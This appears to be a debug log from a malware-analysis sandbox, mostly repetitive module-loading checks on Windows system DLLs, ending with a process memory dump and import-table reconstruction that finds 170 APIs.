2020-03-24 10:13:33,480 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,480 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,480 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,480 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,480 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,480 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,480 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,496 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,496 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,512 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,512 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,512 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,512 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,526 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,542 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,558 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,558 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,558 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,558 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,558 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,558 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,558 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,558 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,558 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,558 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,605 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,621 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,635 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,635 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,635 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,635 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,635 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,635 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,635 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,635 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,635 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,635 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,635 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,635 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:33,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:33,651 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:13:33,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:13:33,651 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ktmw32.dll
2020-03-24 10:13:33,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ktmw32.dll
2020-03-24 10:13:33,651 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:33,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:33,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,651 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:33,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:33,651 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\version.dll
2020-03-24 10:13:33,651 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\version.dll
2020-03-24 10:13:33,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,667 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\clbcatq.dll
2020-03-24 10:13:33,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\clbcatq.dll
2020-03-24 10:13:33,667 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\taskschd.dll
2020-03-24 10:13:33,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\taskschd.dll
2020-03-24 10:13:33,667 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\mstask.dll
2020-03-24 10:13:33,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\mstask.dll
2020-03-24 10:13:33,667 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
2020-03-24 10:13:33,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
2020-03-24 10:13:33,667 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\secur32.dll
2020-03-24 10:13:33,667 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\secur32.dll
2020-03-24 10:13:33,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,683 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,698 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,698 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,698 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,698 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,698 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,698 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,713 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,713 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,713 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,713 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,713 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,713 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,713 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,713 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,713 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,730 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,746 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,746 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,746 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,746 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,760 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,760 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,760 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,760 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,760 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,760 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,760 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,776 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,776 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,776 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,776 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,776 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,776 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,776 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,776 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,792 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,808 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,808 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,808 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,808 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,808 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,808 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,808 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,823 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,823 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,823 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,823 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,823 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,823 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,823 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,823 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,823 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,838 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,838 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,838 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,838 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,838 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,838 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,838 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,838 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,838 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,855 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,855 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\credssp.dll
2020-03-24 10:13:33,869 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\credssp.dll
2020-03-24 10:13:33,869 [root] DEBUG: DumpProcessFixImports: Instantiating PeParser with address: 0x00E00000
2020-03-24 10:13:33,869 [root] DEBUG: DumpProcessFixImports: Module entry point VA is 0x00E17683
2020-03-24 10:13:33,869 [root] DEBUG: Module image dump success
2020-03-24 10:13:33,869 [root] DEBUG: DumpProcessFixImports: Found IAT - 0xe00ffc, size: 0x310
2020-03-24 10:13:33,869 [root] DEBUG: getApiByVirtualAddress :: There is a api resolving bug, VA: 754B3E61
2020-03-24 10:13:33,869 [root] DEBUG: -> Possible API: GlobalFree ord: 348
2020-03-24 10:13:33,885 [root] DEBUG: -> Possible API: LocalFree ord: 428
2020-03-24 10:13:33,885 [root] DEBUG: IAT parsing finished, found 170 valid APIs, missed 0 APIs
